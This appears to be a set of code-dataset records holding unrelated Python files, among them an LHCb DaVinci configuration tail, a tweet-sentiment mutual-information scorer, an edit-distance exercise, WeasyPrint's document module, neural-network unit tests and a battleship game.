'[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> pi+ ^pi-)) pi+]CC',\n 'pis' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> pi+ pi-)) ^pi+]CC',\n })\n\n\nif dataSample.isMC: # Kill banks with old stripping\n from Configurables import EventNodeKiller\n eventNodeKiller = EventNodeKiller('Stripkiller')\n eventNodeKiller.Nodes = [ '/Event/AllStreams', '/Event/Strip' ]\n\n # Rerun the stripping selection if MC\n\n\n from StrippingConf.Configuration import StrippingConf, StrippingStream\n from StrippingSettings.Utils import strippingConfiguration\n from StrippingArchive.Utils import buildStreams\n from StrippingArchive import strippingArchive\n \n # Standard stripping21 \n stripping='stripping21'\n config = strippingConfiguration(stripping)\n archive = strippingArchive(stripping)\n streams = buildStreams(stripping=config, archive=archive)\n \n # Select my line \n MyStream = StrippingStream(\"MyStream\")\n MyLines = [ 'Stripping'+line.lineName for line in [Phi2KsKs_line] ]\n \n for stream in streams: \n for line in stream.lines:\n if line.name() in MyLines:\n MyStream.appendLines( [ line ] )\n\n # Configure Stripping\n from Configurables import ProcStatusCheck\n filterBadEvents = ProcStatusCheck()\n \n sc = StrippingConf( Streams = [ MyStream ],\n MaxCandidates = 2000,\n AcceptBadEvents = False,\n BadEventSelection = filterBadEvents )\n\n DaVinci().appendToMainSequence( [ eventNodeKiller, sc.sequence() ] )\n\n # MC Tuples\n addMCTuple('phi2KsKs', '[phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KS0 -> ^pi+ ^pi-)]CC')\n addMCTuple('phi2KsKl', '[phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KL0 -> ^pi+ ^pi-)]CC')\n addMCTuple('Ds_phi2KsKl', '[D_s+ -> ^(phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KS0 -> ^pi+ ^pi-)) ^pi+]CC')\n if 'minbias' in dataSample.name:\n addMCTuple('phi2KK', '[phi(1020) -> ^K- ^K-]CC')\n # addMCTuple('KsKs', '[(KS0 -> ^pi+ ^pi-)cc && (KS0 -> ^pi+ ^pi-)cc]')\n addMCTuple('Ks', '[KS0 -> ^pi+ ^pi-]CC')\n\n from Configurables import PrintMCTree, PrintMCDecayTreeTool\n mctree = PrintMCTree(\"PrintTruePhi\")\n mctree.addTool(PrintMCDecayTreeTool, name = \"PrintMC\")\n mctree.PrintMC.Information = \"Name\"\n mctree.ParticleNames = [ \"phi(1020)\", 'KS0' ]\n mctree.Depth = 2\n \n \n###########################################################\n\nfor strLine in [Phi2KsKs_line]:\n strLine.select()\n strLine.makeTuple()\n\n DaVinci().appendToMainSequence( [ strLine.sequence.sequence() ])\n\n\nDaVinci().HistogramFile = \"DVHistos.root\"\nDaVinci().TupleFile = dataSample.outputNtupleName\n\n# ###################################################\n# #\n# # Configuration of uDSTWriter\n# #\n\n# from DSTWriters.Configuration import SelDSTWriter, stripMicroDSTStreamConf, stripMicroDSTElements\n\n# SelDSTWriterConf = {'default' : stripMicroDSTStreamConf(pack=False)}\n\n# SelDSTWriterElements = {'default' : stripMicroDSTElements(pack=False)}\n\n# udstWriter = SelDSTWriter('MyMicroDSTWriter',\n# StreamConf = SelDSTWriterConf,\n# MicroDSTElements = SelDSTWriterElements,\n# OutputFileSuffix = dataSample.outputNtupleName.split('.')[0],\n# SelectionSequences = sc.activeStreams(),\n# )\n\n# DaVinci().appendToMainSequence( [ udstWriter.sequence() ] )\n\n# ###################################################\n\nfrom Configurables import Gaudi__IODataManager as IODataManager\nIODataManager( \"IODataManager\" ).UseGFAL = False\n\n\n","sub_path":"Rootuplizer_Ds/Rootuplizer.py","file_name":"Rootuplizer.py","file_ext":"py","file_size_in_byte":14961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 
+{"seq_id":"49521985","text":"\"\"\"\n--------------------------------------\nauthor: Uli Steinbach\nfeature extraction: mutual information \nproject assignment: sentiment analysis of tweets\n--------------------------------------\n\"\"\"\n\nimport math \n\n# The function mutualInformation is called with a token and the statistics of its occurrence\n# frequencies in the negative and positive training data;\n# all of this information is read from the two objects neg and pos\ndef mutualInformation(word, neg, pos):\n\tnegCorp = []\n\tposCorp = []\n\t# total number of documents in pos and neg training set\n\tN = neg.corpusLength + pos.corpusLength\n\tprint(N)\n\t\n\t# tokenLexicon is a dictionary containing each type in the respective training set as a key and a list of #totalOccurrences of token and #tweetsContainingType\n\t# e.g. { ..., 'look' : [23, 21] , ...} --> token 'look' occurs 23 times in the negative training set and type 'look' occurs in 21 different tweets in the negative training set\n\tfor key, val in neg.tokenLexicon.items():\n\t\tif(key == word):\n\t\t\tnegCorp = val\n\tfor key, val in pos.tokenLexicon.items():\n\t\tif(key == word):\n\t\t\tposCorp = val\t\t\n\ttry:\n\t\t# number of occurrences of token in positive corpus\n\t\tN11 = posCorp[1] + 1\n\texcept IndexError:\n\t\t# if not found, default smoothing value of [1, 1] to avoid zero values\n\t\tN11 = 1\n\t\tposCorp = [1,1]\n\t\t\n\ttry:\n\t\t# number of occurrences of token in negative corpus\n\t\tN10 = negCorp[1] + 1 \n\texcept IndexError:\n\t\t# if not found, default smoothing value of [1, 1] to avoid zero values\n\t\tN10 = 1\n\t\tnegCorp = [1,1]\n\t# number of tokens != token in negative corpus \n\tN00 = N - ((pos.corpusLength) - N11) - N11 - N10\n\t# number of tokens != token in positive corpus\n\tN01 = N - ((neg.corpusLength) - N10) - N10 - N11\n\t# number of tokens in positive corpus\n\tN_1 = N01 + N11\n\t# combined number of occurrences of token in negative corpus and positive corpus\n\tN1_ = N10 + N11\n\t# combined number of occurrences of tokens != token in negative corpus and positive corpus\n\tN0_ = N01 + N00\n\t# number of tokens in negative corpus\n\tN_0 = N10 + N00\n\n\t# calculate probabilities according to the formula for mutual information, see: http://nlp.stanford.edu/IR-book/html/htmledition/mutual-information-1.html#mifeatsel2\n\tp1 = (N11/N) * math.log((N*N11)/(N1_*N_1), 2)\n\tp2 = (N01/N) * math.log((N*N01)/(N0_*N_1), 2)\n\tp3 = (N10/N) * math.log((N*N10)/(N1_*N_0), 2)\n\tp4 = (N00/N) * math.log((N*N00)/(N0_*N_0), 2)\n\n\tmI = p1 + p2 + p3 + p4 \n\t# label the results with the majority class count \n\tif(negCorp[0] > posCorp[0]):\n\t\treturn(mI, \"neg\")\n\tif(negCorp[0] < posCorp[0]):\n\t\treturn(mI, \"pos\")\n\telse:\n\t\t# all words appearing equally distributed among pos and neg class\n\t\treturn(mI, \"neutral\")\n","sub_path":"GetData/mI.py","file_name":"mI.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"571411890","text":"\"\"\"\nGiven two strings S and T, determine if they are both one edit distance apart.\n\nExample\nExample 1:\n\nInput: s = \"aDb\", t = \"adb\"\nOutput: true\nExample 2:\n\nInput: s = \"ab\", t = \"ab\"\nOutput: false\nExplanation:\ns = t, so they aren't one edit distance apart\n\"\"\"\n\n\ndef isOneEditDistance(s, t):\n    n, m = len(s), len(t)\n    if abs(n - m) > 1:\n        return False\n\n    i = j = diff = 0\n    while i < n and j < m:\n        if s[i] != t[j]:\n            if diff == 1:\n                return False\n\n            if n > m:\n                i += 1\n            elif 
n < m:\n j += 1\n else:\n i, j = i + 1, j + 1\n diff += 1\n else:\n i, j = i + 1, j + 1\n\n diff += i < n or j < m\n\n return diff == 1\n\n\ndef __test(s, t, expected):\n actual = isOneEditDistance(s, t)\n\n assert actual == expected, 'Wrong answer'\n print('Accepted')\n\n\nif __name__ == '__main__':\n s, t = \"aDb\", \"adb\"\n __test(s, t, True)\n\n s, t = \"a\", \"adb\"\n __test(s, t, False)\n\n s, t = \"aDbb\", \"adb\"\n __test(s, t, False)\n\n s, t = \"Dab\", \"adb\"\n __test(s, t, False)\n\n s, t = \"adB\", \"adb\"\n __test(s, t, True)","sub_path":"Problems/companies/Facebook/edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"480530763","text":"# coding: utf8\n\"\"\"\n weasyprint.document\n -------------------\n\n Entry point to the rendering process.\n\n :copyright: Copyright 2011-2012 Simon Sapin and contributors, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport io\nimport sys\nimport math\nimport shutil\n\nimport cairo\n\nfrom .css import get_all_computed_styles\nfrom .formatting_structure.build import build_formatting_structure\nfrom .urls import FILESYSTEM_ENCODING\nfrom . import layout\nfrom . import draw\nfrom . import images\nfrom . import pdf\n\n\nclass Document(object):\n \"\"\"Abstract output document.\"\"\"\n def __init__(self, element_tree, enable_hinting, url_fetcher,\n user_stylesheets, user_agent_stylesheets):\n self.element_tree = element_tree #: lxml HtmlElement object\n self.enable_hinting = enable_hinting\n self.url_fetcher = url_fetcher\n self.user_stylesheets = user_stylesheets\n self.user_agent_stylesheets = user_agent_stylesheets\n self._image_cache = {}\n self._computed_styles = None\n self._formatting_structure = None\n self._pages = None\n\n # This is mostly useful to make pseudo_type optional.\n def style_for(self, element, pseudo_type=None):\n \"\"\"\n Convenience method to get the computed styles for an element.\n \"\"\"\n return self.computed_styles.get((element, pseudo_type))\n\n @property\n def computed_styles(self):\n \"\"\"\n dict of (element, pseudo_element_type) -> StyleDict\n StyleDict: a dict of property_name -> PropertyValue,\n also with attribute access\n \"\"\"\n if self._computed_styles is None:\n self._computed_styles = get_all_computed_styles(\n self.element_tree, url_fetcher=self.url_fetcher,\n user_stylesheets=self.user_stylesheets,\n ua_stylesheets=self.user_agent_stylesheets,\n medium='print')\n return self._computed_styles\n\n @property\n def formatting_structure(self):\n \"\"\"\n The root of the formatting structure tree, ie. 
the Box\n        for the root element.\n        \"\"\"\n        if self._formatting_structure is None:\n            self._formatting_structure = build_formatting_structure(\n                self.element_tree, self.style_for, self.get_image_from_uri)\n        return self._formatting_structure\n\n    @property\n    def pages(self):\n        \"\"\"\n        List of laid-out pages with an absolute size and position\n        for every box.\n        \"\"\"\n        if self._pages is None:\n            context = layout.LayoutContext(\n                self.enable_hinting, self.style_for, self.get_image_from_uri)\n            self._pages = list(layout.layout_document(\n                context, self.formatting_structure))\n        return self._pages\n\n    def get_image_from_uri(self, uri, type_=None):\n        return images.get_image_from_uri(\n            self._image_cache, self.url_fetcher, uri, type_)\n\n    def get_png_surfaces(self, resolution=None):\n        \"\"\"Yield (width, height, image_surface) tuples, one for each page.\"\"\"\n        px_resolution = (resolution or 96) / 96\n        for page in self.pages:\n            width = int(math.ceil(page.margin_width() * px_resolution))\n            height = int(math.ceil(page.margin_height() * px_resolution))\n            surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, width, height)\n            context = draw.make_cairo_context(\n                surface, self.enable_hinting, self.get_image_from_uri)\n            context.scale(px_resolution, px_resolution)\n            draw.draw_page(page, context)\n            yield width, height, surface\n\n    def get_png_pages(self, resolution=None):\n        \"\"\"Yield (width, height, png_bytes) tuples, one for each page.\"\"\"\n        for width, height, surface in self.get_png_surfaces(resolution):\n            file_obj = io.BytesIO()\n            surface.write_to_png(file_obj)\n            yield width, height, file_obj.getvalue()\n\n    def write_png(self, target=None, resolution=None):\n        \"\"\"Write a single PNG image.\"\"\"\n        surfaces = list(self.get_png_surfaces(resolution))\n        if len(surfaces) == 1:\n            _, _, surface = surfaces[0]\n        else:\n            total_height = sum(height for _, height, _ in surfaces)\n            max_width = max(width for width, _, _ in surfaces)\n            surface = cairo.ImageSurface(\n                cairo.FORMAT_ARGB32, max_width, total_height)\n            context = cairo.Context(surface)\n            pos_y = 0\n            for width, height, page_surface in surfaces:\n                pos_x = (max_width - width) // 2\n                context.set_source_surface(page_surface, pos_x, pos_y)\n                context.paint()\n                pos_y += height\n\n        if target is None:\n            target = io.BytesIO()\n            surface.write_to_png(target)\n            return target.getvalue()\n        else:\n            if sys.version_info[0] < 3 and isinstance(target, unicode):\n                # py2cairo 1.8 does not support unicode filenames.\n                target = target.encode(FILESYSTEM_ENCODING)\n            surface.write_to_png(target)\n\n    def write_pdf(self, target=None):\n        \"\"\"Write a single PDF file.\"\"\"\n        # Use an in-memory buffer. We will need to seek for metadata\n        # TODO: avoid this if target can seek? 
Benchmark first.\n        file_obj = io.BytesIO()\n        # We’ll change the surface size for each page\n        surface = cairo.PDFSurface(file_obj, 1, 1)\n        px_to_pt = pdf.PX_TO_PT\n        for page in self.pages:\n            surface.set_size(page.margin_width() * px_to_pt,\n                             page.margin_height() * px_to_pt)\n            context = draw.make_cairo_context(\n                surface, self.enable_hinting, self.get_image_from_uri)\n            context.scale(px_to_pt, px_to_pt)\n            draw.draw_page(page, context)\n            surface.show_page()\n        surface.finish()\n\n        pdf.write_pdf_metadata(self.pages, file_obj)\n\n        if target is None:\n            return file_obj.getvalue()\n        else:\n            file_obj.seek(0)\n            if hasattr(target, 'write'):\n                shutil.copyfileobj(file_obj, target)\n            else:\n                with open(target, 'wb') as fd:\n                    shutil.copyfileobj(file_obj, fd)\n","sub_path":"weasyprint/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"464006701","text":"'''Utility functions for the deploy module.'''\nimport os\nfrom datetime import datetime\nfrom pathlib import Path\nfrom joblib import load\n\n\ndef progress_bar(current, total, bar_length = 20):\n    '''Visual progress bar in console.'''\n    percent = float(current) * 100 / total\n    arrow = '-' * int(percent/100 * bar_length - 1) + '>'\n    spaces = ' ' * (bar_length - len(arrow))\n    print('Progress: [%s%s] %d %%' % (arrow, spaces, percent), end='\\r')\n\ndef ensure_path_exists(path):\n    '''Creates directory if not exists.'''\n    Path(path).mkdir(parents=True, exist_ok=True)\n\ndef remove_file(path):\n    '''Remove the file if it exists.'''\n    Path(path).unlink(missing_ok=True)\n\n# pylint: disable=W0703\ndef load_best_clf():\n    '''Loads the best original model.'''\n    file_to_load, latest_date = 'model.joblib', datetime.strptime('01-01-1970', \"%m-%d-%Y\")\n    for filename in os.listdir('output'):\n        if filename.endswith(\".joblib\"):\n            try:\n                if latest_date < datetime.strptime(\n                    filename.split('_')[1].split('.')[0], \"%m-%d-%Y\"):\n                    file_to_load = filename\n                    latest_date = datetime.strptime(\n                        filename.split('_')[1].split('.')[0], \"%m-%d-%Y\")\n                    classifier_name = filename.split('_')[0]\n            except Exception:\n                continue\n\n    return load('output/' + file_to_load), classifier_name\n","sub_path":"deploy_model/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"92515936","text":"\"\"\"Unit tests for the NeuralNetwork class.\"\"\"\n\nfrom itertools import product\n\nimport numpy as np\nimport pytest\nfrom scipy.special import expit\n\nimport deeplib as dl\n\n\ndef test_bad_args():\n    \"\"\"Check for errors raised when arguments are invalid.\"\"\"\n    with pytest.raises(TypeError):\n        dl.model.NeuralNetwork(loss=\"not a loss function\",\n                               optimizer=dl.optimizer.GradientDescent())\n    with pytest.raises(TypeError):\n        dl.model.NeuralNetwork(loss=dl.loss.AbsoluteError(),\n                               optimizer=\"not an optimizer\")\n\n    model = dl.model.NeuralNetwork(loss=dl.loss.SquaredError(),\n                                   optimizer=dl.optimizer.GradientDescent())\n    with pytest.raises(TypeError):\n        model.add(\"Not a layer\")\n\n\ndef test_ols():\n    \"\"\"Test a simple OLS model built as a neural network.\"\"\"\n    # The true model\n    n = 10\n    slope = 2\n    intercept = 1\n    x = np.arange(n)\n    y_true = intercept + slope * x\n\n    for standardize in (True, False):\n        # Build an ordinary least squares model\n        model = dl.model.NeuralNetwork(\n            loss=dl.loss.SquaredError(),\n            
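# (added note) squared-error loss + momentum SGD makes this single affine layer an ordinary least-squares fit\n            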
optimizer=dl.optimizer.GradientDescent(learning_rate=0.01,\n momentum=0.9),\n standardize=standardize)\n\n with pytest.raises(RuntimeError):\n # This model has no layers yet so it can't be trained\n model.train(x, y_true)\n\n model.add(dl.layer.Affine(n_outputs=1))\n\n with pytest.raises(RuntimeError):\n # This model isn't trained yet\n model.check_trained()\n\n for weighted, bootstrap in product((True, False), (True, False)):\n model.train(x, y_true, n_epochs=400, batch_size=5,\n clipping_threshold=3, weighted=weighted,\n bootstrap=bootstrap, random_state=0)\n model.check_trained()\n\n y_pred = model.predict(x).reshape(-1)\n\n np.testing.assert_almost_equal(y_true, y_pred)\n\n\ndef test_ols_convoluted():\n \"\"\"Test a convoluted multi-layer model that's still just OLS.\"\"\"\n # The true model\n n = 20\n slope = 2\n intercept = 1\n x = np.random.RandomState(0).normal(size=n)\n y_true = intercept + slope * x\n\n for standardize in (True, False):\n # Build a OLS model\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.Nesterov(learning_rate=0.01, momentum=0.9),\n standardize=standardize)\n\n with pytest.raises(RuntimeError):\n # This model has no layers yet so it can't be trained\n model.train(x, y_true)\n\n # Add a few do-nothing layers\n model.add(dl.layer.Identity())\n model.add(dl.layer.Identity())\n\n with pytest.raises(RuntimeError):\n # The model doesn't have any trainable layers yet\n model.train(x, y_true)\n\n # Add two affine layers (of course the net effect is the same as one\n # affine layer since the composition of two affine transformations is\n # still affine)\n model.add(dl.layer.Affine(n_outputs=3))\n model.add(dl.layer.Affine(n_outputs=1))\n\n with pytest.raises(RuntimeError):\n # This model isn't trained yet\n model.check_trained()\n\n for weighted, bootstrap in product((True, False), (True, False)):\n model.train(x, y_true, n_epochs=100, batch_size=5,\n clipping_threshold=3, weighted=weighted,\n bootstrap=bootstrap, random_state=0)\n model.check_trained()\n\n y_pred = model.predict(x).reshape(-1)\n\n np.testing.assert_almost_equal(y_true, y_pred)\n\n\ndef test_easy_ols():\n \"\"\"Example from http://onlinestatbook.com/2/regression/intro.html\"\"\"\n x = [1, 2, 3, 4, 5]\n y = [1, 2, 1.3, 3.75, 2.25]\n\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.GradientDescent(learning_rate=0.1, momentum=0.9),\n standardize=False)\n\n layer = dl.layer.Affine(n_outputs=1)\n model.add(layer)\n\n model.train(x, y, n_epochs=1000, batch_size=5, weighted=False,\n bootstrap=False, random_state=1)\n\n np.testing.assert_almost_equal(layer.bias.item(), 0.785)\n np.testing.assert_almost_equal(layer.weights.item(), 0.425)\n\n\ndef test_easy_linear_regression():\n \"\"\"Simple multidimensional linear regression as a neural network.\"\"\"\n rs = np.random.RandomState(0)\n\n # True model\n n = 100\n p = 10\n coef = np.arange(p)\n intercept = -3\n\n x = rs.normal(size=(n, p))\n noise = rs.normal(scale=0.05, size=n)\n y = intercept + x.dot(coef) + noise\n\n # Linear regression model\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.GradientDescent(learning_rate=0.02,\n momentum=0.5),\n standardize=False)\n\n layer = dl.layer.Affine(n_outputs=1)\n model.add(layer)\n\n for bootstrap in (True, False):\n model.train(x, y, n_epochs=500, batch_size=10, weighted=False,\n bootstrap=bootstrap, random_state=rs)\n\n np.testing.assert_almost_equal(layer.bias.item(), intercept, decimal=2)\n 
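# (added note) mirrors the bias check above: the fitted weights should likewise recover\n        # the true coefficients of the generating model to two decimals\n        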
np.testing.assert_almost_equal(layer.weights[:, 0], coef, decimal=2)\n\n\ndef test_seber_lee_linear_regression():\n \"\"\"Example from Exercises 3a, #3 in Seber & Lee (2003)\n\n References\n ----------\n .. [1] George A. F. Seber and Alan J. Lee. Linear Regression Analysis,\n Second Edition. Wiley Series in Probability and Statistics.\n Wiley-Interscience, Hoboken, NJ (2003), pp. xvi+557.\n `DOI `__.\n \"\"\"\n x = [[1, 0], [2, -1], [1, 2]]\n rs = np.random.RandomState(0)\n\n repeats = 10\n for _ in range(repeats):\n y = rs.normal(scale=20, size=len(x))\n y1, y2, y3 = y\n\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.Adam(learning_rate=5),\n standardize=False)\n\n layer = dl.layer.Linear(n_outputs=1)\n model.add(layer)\n\n model.train(x, y, n_epochs=200, batch_size=3, weighted=False,\n bootstrap=False, random_state=0)\n theta, phi = layer.weights[:, 0]\n\n np.testing.assert_almost_equal(theta, (y1 + 2 * y2 + y3) / 6,\n decimal=3)\n np.testing.assert_almost_equal(phi, (2 * y3 - y2) / 5, decimal=3)\n\n\ndef test_learn_xor():\n \"\"\"Learning XOR example from Section 6.1 of [1]_.\n\n References\n ----------\n .. [1] Ian Goodfellow, Yoshua Bengio, and Aaron Courville. Deep Learning.\n MIT Press (2016). `URL `__.\n \"\"\"\n optimizers = [\n dl.optimizer.GradientDescent(learning_rate=0.5, momentum=0.5),\n dl.optimizer.Nesterov(learning_rate=0.2, momentum=0.9),\n dl.optimizer.AdaGrad(learning_rate=0.09),\n dl.optimizer.Adam(learning_rate=0.01),\n ]\n\n for optimizer in optimizers:\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=optimizer,\n standardize=False\n )\n model.add(dl.layer.Affine(n_outputs=2))\n model.add(dl.layer.ReLU())\n model.add(dl.layer.Affine(n_outputs=1))\n\n x = [[0, 0], [0, 1], [1, 0], [1, 1]]\n y = [0, 1, 1, 0]\n\n model.train(x, y, n_epochs=500, batch_size=4, weighted=False,\n random_state=0)\n\n y_pred = model.predict(x).reshape(-1)\n np.testing.assert_almost_equal(y_pred, y, decimal=3,\n err_msg=str(optimizer))\n\n\ndef test_logistic_regression():\n \"\"\"Test fitting a linearly separable logistic regression model.\"\"\"\n rs = np.random.RandomState(0)\n for n_features in (1, 3):\n for n_examples in (10, 100):\n # Generate data from a logistic regression model\n coef = 1 + np.arange(n_features, dtype=np.float64)\n intercept = -1\n\n x = rs.normal(scale=5, size=(n_examples, n_features))\n logits = intercept + x.dot(coef)\n y = rs.binomial(1, expit(logits))\n\n model = dl.model.NeuralNetwork(\n loss=dl.loss.BinaryCrossEntropy(),\n optimizer=dl.optimizer.Adam(),\n standardize=False)\n\n model.add(dl.layer.Affine(n_outputs=1))\n model.add(dl.layer.Sigmoid())\n\n model.train(x, y, n_epochs=300, batch_size=5, weighted=False,\n random_state=0)\n\n y_pred = (model.predict(x).reshape(-1) > 0.5).astype(np.int_)\n\n accuracy = np.mean(y_pred == y)\n\n assert accuracy >= 0.9\n","sub_path":"deeplib/model/tests/test_neural_network.py","file_name":"test_neural_network.py","file_ext":"py","file_size_in_byte":8825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"109765746","text":"import random\n\nfrom battle_ship.collections_enum import Statuses, ShotResult\n\n__author__ = 'gzhukova'\n\n\nclass Cell(object):\n ortho_steps = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n\n def __init__(self, row_index, col_index):\n self.row_index = row_index\n self.col_index = col_index\n self._status = Statuses.free\n\n def get_status(self):\n \"\"\"\n Получение статуса ячейки\n :return: 
the status\n        \"\"\"\n        return self._status\n\n    def set_status(self, new_status):\n        \"\"\"\n        Change the cell's status\n        :param new_status: the new status\n        :return: None\n        \"\"\"\n        if new_status not in Statuses.__dict__.values():\n            raise ValueError(\"Неверный статус ячейки\")\n        self._status = new_status\n    status = property(get_status, set_status)\n\n    @property\n    def coords(self):\n        \"\"\"\n        Property returning the cell's indices\n        :return: tuple(row index, column index)\n        \"\"\"\n        return (self.row_index, self.col_index)\n\n    @property\n    def neighbors_ortho(self):\n        \"\"\"\n        Builds the list of cells that surround the current one vertically and horizontally\n        :return: list of surrounding cells\n        \"\"\"\n        s = []\n        for i, j in self.ortho_steps:\n            if Board.is_position_correct(self.row_index + i, self.col_index + j):\n                s.append((self.row_index + i, self.col_index + j))\n        return s\n\n    @property\n    def neighbors(self):\n        \"\"\"\n        Builds the list of cells that surround the current one on all sides, including the corners\n        :return: list of surrounding cells\n        \"\"\"\n        s = []\n        for i in range(-1, 2):\n            for j in range(-1, 2):\n                if i == 0 and j == 0:\n                    continue\n                if Board.is_position_correct(self.row_index + i, self.col_index + j):\n                    s.append((self.row_index + i, self.col_index + j))\n        return s\n\n    def __str__(self):\n        \"\"\"\n        Custom display method for the element\n        :return: the output string format\n        \"\"\"\n        return str.format(\"row={0} col={1} status={2}\", self.row_index,\n                          self.col_index, self.status)\n\n\nclass Ship(object):\n\n    def __init__(self, count_deck):\n        self.decks = []\n        self.count_deck = count_deck\n\n    def set_status(self):\n        \"\"\"\n        Sets the status for the ship\n        :return: None\n        \"\"\"\n        for deck in self.decks:\n            deck.status = Statuses.ship\n\n    def is_sunk(self):\n        \"\"\"\n        Checks whether the ship has been hit and sunk\n        :return: False - the ship is still afloat, True - the ship is sunk\n        \"\"\"\n        for deck in self.decks:\n            if deck.status == Statuses.ship:\n                return False\n        return True\n\n    def __str__(self):\n        s = []\n        for deck in self.decks:\n            s.append(str(deck))\n        return \" \".join(s)\n\n\nclass Board(object):\n    N = 10\n    COLUMNS = \"abcdefghij\"\n    SHIPS_COUNT = {4: 1, 3: 2, 2: 3, 1: 4}\n    DIRECTION = [\"n\", \"s\", \"w\", \"e\"]\n\n    def __init__(self):\n        self.ships = []\n        self.cells = []\n        for i in range(self.N):\n            self.cells.append([Cell(i, j) for j in range(self.N)])\n\n    def positioning_ships(self):\n        \"\"\"\n        Placement of the ships by the computer\n        :return: None\n        \"\"\"\n        for count_deck, count_ship in self.SHIPS_COUNT.items():\n            for i in range(count_ship):\n                ship = self.create_ship(count_deck)\n                ship.set_status()\n\n    def create_ship(self, count_deck):\n        \"\"\"\n        The computer creates a ship and places it on the board\n        :param count_deck: number of decks\n        :return: the ship\n        \"\"\"\n        self.ships.append(Ship(count_deck))\n        cells_index = []\n        for i in range(self.N):\n            cells_index.append([j for j in range(self.N)])\n        while True:\n            first_deck_cell = self.get_random_cell(cells_index)\n            res = self.is_surround_ok(first_deck_cell)\n            if res is False:\n                cells_index[first_deck_cell.row_index].remove(first_deck_cell.col_index)\n                if len(cells_index[first_deck_cell.row_index]) == 0:\n                    cells_index.remove(cells_index[first_deck_cell.row_index])\n                continue\n            self.ships[-1].decks.append(first_deck_cell)\n            if count_deck == 1:\n                return self.ships[-1]\n            else:\n                direction = self.DIRECTION[:]\n                random.shuffle(direction)\n                for d in direction:\n                    step_row, step_col = self.determine_direction(d)\n                    count_good = 1\n                    for i in range(1, count_deck):\n                        row_index = 
first_deck_cell.row_index + i * step_row\n                        col_index = first_deck_cell.col_index + i * step_col\n                        if not (0 <= row_index < self.N) or not(0 <= col_index < self.N):\n                            break\n                        test_cell = self.cells[row_index][col_index]\n                        res = self.is_surround_ok(test_cell)\n                        if res is False:\n                            break\n                        count_good += 1\n                    if count_good == count_deck:\n                        for i in range(1, count_deck):\n                            row_index = first_deck_cell.row_index + i * step_row\n                            col_index = first_deck_cell.col_index + i * step_col\n                            self.ships[-1].decks.append(self.cells[row_index][col_index])\n                        return self.ships[-1]\n\n    def add_ship(self, row_index, col_index, count_deck, direction):\n        \"\"\"\n        Add a ship to the player's board\n        :param row_index: row coordinate\n        :param col_index: column coordinate\n        :param count_deck: number of decks\n        :param direction: direction\n        :return: None\n        \"\"\"\n        ship = Ship(count_deck)\n        step_row, step_col = self.determine_direction(direction)\n        for i in range(count_deck):\n            ship.decks.append(self.cells[row_index][col_index])\n            col_index += step_col\n            row_index += step_row\n        ship.set_status()\n        self.ships.append(ship)\n\n    @staticmethod\n    def determine_direction(direct):\n        \"\"\"\n        Determines the step for the given direction\n        :param direct: the direction\n        :return: step size horizontally and vertically\n        \"\"\"\n        step_row = 0\n        step_col = 0\n        if direct == \"n\":\n            step_row = - 1\n        elif direct == \"s\":\n            step_row = 1\n        elif direct == \"w\":\n            step_col = - 1\n        elif direct == \"e\":\n            step_col = 1\n        return step_row, step_col\n\n    def get_random_cell(self, cells_index):\n        \"\"\"\n        Picks a random cell from the list\n        :param cells_index: list of cells\n        :return: a random cell\n        \"\"\"\n        row = random.choice(cells_index)\n        row_index = cells_index.index(row)\n        col_index = random.choice(row)\n        return self.cells[row_index][col_index]\n\n    def is_surround_ok(self, cell):\n        \"\"\"\n        Check that the space around the cell is empty\n        :param cell: the cell\n        :return: True - the surroundings are empty, False - there is no room\n        \"\"\"\n        for item in cell.neighbors:\n            if self.cells[item[0]][item[1]].status != Statuses.free:\n                return False\n        return True\n\n    @staticmethod\n    def is_position_correct(row, col):\n        \"\"\"\n        Whether the cell is on the board\n        :param row: row coordinate\n        :param col: column coordinate\n        :return: True - the cell is on the board, False - the cell is off the board\n        \"\"\"\n        if row < 0 or col < 0 or row > Board.N - 1 or col > Board.N - 1:\n            return False\n        return True\n\n    def make_shot_by_position(self, row_index, col_index):\n        \"\"\"\n        A shot by one of the players (human or computer)\n        :param row_index: row index\n        :param col_index: column index\n        :return: the value that the board cell takes\n        \"\"\"\n        cell = self.cells[row_index][col_index]\n        res = ''\n        if cell.status == Statuses.free:\n            cell.status = Statuses.missed\n            res = ShotResult.miss\n        elif cell.status == Statuses.missed:\n            res = ShotResult.error\n        elif cell.status == Statuses.padded:\n            res = ShotResult.error\n        elif cell.status == Statuses.ship:\n            cell.status = Statuses.padded\n            res = ShotResult.hit\n        return res, (row_index, col_index)\n\n    def is_game_finished(self):\n        \"\"\"\n        Determines whether the game is over\n        :return: True - the game is over, False - the game is not over yet\n        \"\"\"\n        for ship in self.ships:\n            if not ship.is_sunk():\n                return False\n        return True\n\n\nif __name__ == \"__main__\":\n    print(\"Вы запустили этот модуль 
